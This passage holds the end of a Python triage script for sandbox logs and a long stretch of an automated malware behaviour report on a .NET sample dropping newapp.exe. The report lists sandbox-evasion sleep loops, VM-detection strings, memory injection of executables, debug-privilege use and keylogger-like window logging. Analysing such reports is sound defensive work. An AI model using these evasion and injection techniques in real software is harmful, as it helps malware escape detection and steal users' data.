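    r"Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Window / User API: threadDelayed 2166",
    r"Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -600000s >= -30000s",
    r"Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 7796 | Thread sleep time: -30000s >= -30000s",
]


def triage(lines):
    """Bucket behaviour lines into evasion indicators; unknown lines go to 'unparsed'."""
    s = {"infinite_waits": Counter(), "finite_delays_ms": [], "write_watch_allocs": Counter(),
         "wmi_vm_fingerprint": set(), "sleep_loop_iterations": 0, "long_sleeps": 0, "unparsed": []}
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            s["unparsed"].append(raw)
            continue
        src, event = m["src"], m["event"]
        if d := DELAY.search(event):
            ms = int(d[1])
            if ms == NET_MAX_DELAY_MS:
                s["infinite_waits"][src] += 1      # per-process count of "forever" waits
            else:
                s["finite_delays_ms"].append(ms)   # kept in report order for loop detection
        elif WRITE_WATCH.search(event):
            s["write_watch_allocs"][src] += 1
        elif w := WMI.search(event):
            if w[1] in VM_FINGERPRINT_WMI:
                s["wmi_vm_fingerprint"].add(w[1])
        elif c := SLEEP_COUNT.search(event):
            s["sleep_loop_iterations"] += int(c[1])
        elif t := SLEEP_TIME.search(event):
            s["long_sleeps"] += int(int(t[1]) >= int(t[2]))   # same comparison the report prints
        else:
            s["unparsed"].append(raw)
    return s


def countdown_loop(delays, tolerance_ms=50):
    """Detect a strictly decreasing delay series with near-constant steps.

    Consistent with "sleep until deadline, re-sleep the remainder if woken early",
    which defeats sandboxes that shorten sleeps. Returns (start_ms, steps, step_ms) or None.
    """
    if len(delays) < 3:
        return None
    steps = [a - b for a, b in zip(delays, delays[1:])]
    if min(steps) <= 0:
        return None
    mean = sum(steps) / len(steps)
    if max(abs(st - mean) for st in steps) > tolerance_ms:
        return None
    return delays[0], len(steps), round(mean)


def indicators(summary):
    """Reduce the summary to short analyst-facing indicator strings."""
    out = []
    if summary["infinite_waits"]:
        out.append("TimeSpan.MaxValue wait in %d process(es)" % len(summary["infinite_waits"]))
    if summary["wmi_vm_fingerprint"]:
        out.append("adapter enumeration via WMI: " + ", ".join(sorted(summary["wmi_vm_fingerprint"])))
    total_ww = sum(summary["write_watch_allocs"].values())
    if total_ww >= WRITE_WATCH_MIN:
        out.append("%d write-watch reservations (weak for .NET: the CLR GC reserves heap this way)" % total_ww)
    loop = countdown_loop(summary["finite_delays_ms"])
    if loop:
        out.append("countdown sleep loop from %d ms, %d re-sleeps of ~%d ms" % loop)
    return out


if __name__ == "__main__":
    for line in indicators(triage(SAMPLE_LINES)):
        print("-", line)
```

Run it on the cleaned-up lines of a report section and the four indicators for this sample fall out; feed it the full 600000 to 594187 series and widen tolerance_ms, since a few of the real steps (for example 595662 to 595428) exceed 200 ms.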
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 7796 | Thread sleep time: -28592453314249787s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 7796 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep count: 37 > 30
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -34126476536362649s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5300 | Thread sleep count: 2951 > 30
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -599874s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5300 | Thread sleep count: 6895 > 30
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -599763s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -599656s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -599547s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -599437s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -599328s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -599219s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -599109s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -599000s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -598891s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -598766s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -598641s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -598519s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -598318s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -598188s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -598063s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -597938s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160 | Thread sleep time: -597828s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597719s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597263s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596700s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595811s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595662s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595428s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594516s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594187s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1724Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1724Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7636Thread sleep count: 40 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7636Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7636Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep count: 4145 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep count: 5711 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599763Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598519Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598318Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598188Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597263Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596700Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595811Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595662Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595428Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594969Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594844Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594516Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594406Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594297Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594187Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 30000Jump to behavior
                  Source: QUOTATIONS#08670.exe, newapp.exe.4.drBinary or memory string: d6nu^YDY7bKtlFzp?nrett^pnreKtaPet^Dtrohl_teSQretnI?nottu}nosiMapmoCXnirtS?noitpZcxEytVruceSZkaMnPitpecGEtratldaerhknoitOecxEnPitareOOdilaInInoVtpecxzlluNtQemugr~noitOecxEeXnaRfOKuOxedQInoiKpecxE[ohteM[ilavnvnoitOecxEdZtroppJStoNQoitpe\xEdesPpsiDt\ejbOQoitpe\xEdepOarWemVtnuRQoitpe\xEbdP?noitiKepeReXasseMZkaFnPitisootratSRroFnPitisootratS`tesnPitidnPC_noVtcellPCwoRwZiVdirxataDQoitceSloCnmJloCweVVdirG^taDnPitcelSoClorKnoCnPitcelSoClle|weiVdVrGata{noit\elfeR
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2019882237.0000000004E50000.00000004.08000000.00040000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                  Source: QUOTATIONS#08670.exe, newapp.exe.4.drBinary or memory string: noVtpecxzlluNtQemugr~
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2571627082.00000000012B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Memory written: C:\Users\user\Desktop\QUOTATIONS#08670.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Memory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Memory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Process created: C:\Users\user\Desktop\QUOTATIONS#08670.exe "C:\Users\user\Desktop\QUOTATIONS#08670.exe"
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $_q8<b>[ Program Manager]</b> (03/10/2024 19:44:51)<br>{Win}THdq|
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $_q3<b>[ Program Manager]</b> (03/10/2024 19:44:51)<br>
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $_q9<b>[ Program Manager]</b> (03/10/2024 19:44:51)<br>{Win}rTHdq|
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Users\user\Desktop\QUOTATIONS#08670.exe VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Users\user\Desktop\QUOTATIONS#08670.exe VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
